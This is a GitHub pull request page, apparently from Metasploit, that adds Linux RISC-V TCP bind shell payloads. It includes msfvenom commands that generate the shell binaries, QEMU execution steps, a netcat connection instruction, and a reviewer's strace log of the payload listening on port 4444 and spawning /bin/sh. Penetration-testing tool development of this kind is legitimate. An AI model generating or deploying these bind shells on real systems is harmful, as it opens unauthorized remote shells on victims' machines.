Skip to content

Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads #20733

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
dledda-r7 merged 1 commit into from
Jan 5, 2026
Merged

Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads #20733

dledda-r7 merged 1 commit into from
Jan 5, 2026
+353 −0

Conversation

@bcoles
Copy link
Contributor

@bcoles bcoles commented Nov 27, 2025

Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads.

Source

Verification

Tested with QEMU. For other test environments, see #19518 (comment).

Generate a Linux Command Shell, Bind TCP Inline payload (with optional NOP sled):

./msfvenom -n 100 -f elf -p linux/riscv64le/shell_bind_tcp LPORT=1337 > bind.elf

./msfvenom -n 100 -f elf -p linux/riscv32le/shell_bind_tcp LPORT=1337 > bind.elf

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-riscv64 -strace ./bind.elf

$ /home/user/qemu/build/qemu-riscv32 -strace ./bind.elf

Note the payload was executed successfully (lsof -i :1337) :)

Connect to the bindshell with netcat nc HOST 1337 (or use exploit/multi/handler).

@dledda-r7 dledda-r7 self-assigned this Nov 27, 2025
@bcoles bcoles force-pushed the linux-riscv-tcp-bind-shell branch from 9cf50f4 to 7ba6d9e Compare December 1, 2025 12:19
@bcoles bcoles force-pushed the linux-riscv-tcp-bind-shell branch from 7ba6d9e to 5871d90 Compare December 11, 2025 01:55
@jbx81-1337
Copy link
Contributor

jbx81-1337 commented Dec 23, 2025 

ubuntu@ubuntu:~$ strace ./bind_shell.riscv64.elf
execve("./bind_shell.riscv64.elf", ["./bind_shell.riscv64.elf"], 0x7ffff7dd8a60 /* 22 vars */) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1)                            = 0
accept(3, NULL, NULL)                   = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
--- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
accept(3, NULL, NULL)                   = 4
dup3(4, 2, 0)                           = 2
dup3(4, 1, 0)                           = 1
dup3(4, 0, 0)                           = 0
execve("/bin/sh", NULL, NULL)           = 0
brk(NULL)                               = 0x555705458000
faccessat(AT_FDCWD, "/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 5
fstat(5, {st_mode=S_IFREG|0644, st_size=21523, ...}) = 0
mmap(NULL, 21523, PROT_READ, MAP_PRIVATE, 5, 0) = 0x7ff898cc2000
close(5)                                = 0
openat(AT_FDCWD, "/lib/riscv64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 5
read(5, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0\363\0\1\0\0\0Ry\2\0\0\0\0\0"..., 832) = 832
fstat(5, {st_mode=S_IFREG|0755, st_size=1534120, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff898cc0000
mmap(NULL, 1572280, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 5, 0) = 0x7ff898b40000
mmap(0x7ff898caf000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 5, 0x16f000) = 0x7ff898caf000
mmap(0x7ff898cb4000, 48568, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff898cb4000
close(5)                                = 0
set_tid_address(0x7ff898cc0d90)         = 1440
set_robust_list(0x7ff898cc0da0, 24)     = 0
mprotect(0x7ff898caf000, 12288, PROT_READ) = 0
mprotect(0x55570022a000, 8192, PROT_READ) = 0
mprotect(0x7ff898cee000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7ff898cc2000, 21523)           = 0
getuid()                                = 1000
getgid()                                = 1000
getpid()                                = 1440
rt_sigaction(SIGCHLD, {sa_handler=0x55570021f526, sa_mask=~[RTMIN RT_1], sa_flags=0}, NULL, 8) = 0
geteuid()                               = 1000
getppid()                               = 1437
getrandom("\x0b\x33\xfb\x5f\xf2\x5a\x83\x01", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x555705458000
brk(0x555705479000)                     = 0x555705479000
getcwd("/home/ubuntu", 4096)            = 13
ioctl(0, TCGETS, 0x7fffd13d1b70)        = -1 ENOTTY (Inappropriate ioctl for device)
geteuid()                               = 1000
getegid()                               = 1000
rt_sigaction(SIGINT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=~[RTMIN RT_1], sa_flags=0}, NULL, 8) = 0
rt_sigaction(SIGQUIT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=~[RTMIN RT_1], sa_flags=0}, NULL, 8) = 0
rt_sigaction(SIGTERM, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTERM, {sa_handler=SIG_DFL, sa_mask=~[RTMIN RT_1], sa_flags=0}, NULL, 8) = 0
read(0, "ls\n", 8192)                   = 3
newfstatat(AT_FDCWD, "/usr/local/sbin/ls", 0x7fffd13d1958, 0) = -1 ENOENT (No such file or directory)
newfstatat(AT_FDCWD, "/usr/local/bin/ls", 0x7fffd13d1958, 0) = -1 ENOENT (No such file or directory)
newfstatat(AT_FDCWD, "/usr/sbin/ls", 0x7fffd13d1958, 0) = -1 ENOENT (No such file or directory)
newfstatat(AT_FDCWD, "/usr/bin/ls", {st_mode=S_IFREG|0755, st_size=142256, ...}, 0) = 0
rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], NULL, 8) = 0
clone(child_stack=0x7fffd13d1a00, flags=CLONE_VM|CLONE_VFORK|SIGCHLD) = 1503
rt_sigprocmask(SIG_SETMASK, [], ~[KILL STOP RTMIN RT_1], 8) = 0
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 1503
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=1503, si_uid=1000, si_status=0, si_utime=2 /* 0.02 s */, si_stime=1 /* 0.01 s */} ---
rt_sigreturn({mask=[]})                 = 1503
wait4(-1, 0x7fffd13d18bc, WNOHANG, NULL) = -1 ECHILD (No child processes)
read(0, "exit\n", 8192)                 = 5
exit_group(0)                           = ?
+++ exited with 0 +++
ubuntu@ubuntu:~$

@dledda-r7 dledda-r7 merged commit 385c4f9 into rapid7:master Jan 5, 2026
56 of 74 checks passed
@bcoles bcoles deleted the linux-riscv-tcp-bind-shell branch January 5, 2026 11:46
@dledda-r7 dledda-r7 added the rn-payload-enhancement release notes for enhanced payloads label Jan 9, 2026
@dledda-r7
Copy link
Contributor

dledda-r7 commented Jan 9, 2026

Release Notes

This adds a new payload, a bind shell for Linux RISC-V targets.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@dledda-r7 dledda-r7 dledda-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels

payload riscv RISC-V rn-payload-enhancement release notes for enhanced payloads

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@bcoles @jbx81-1337 @dledda-r7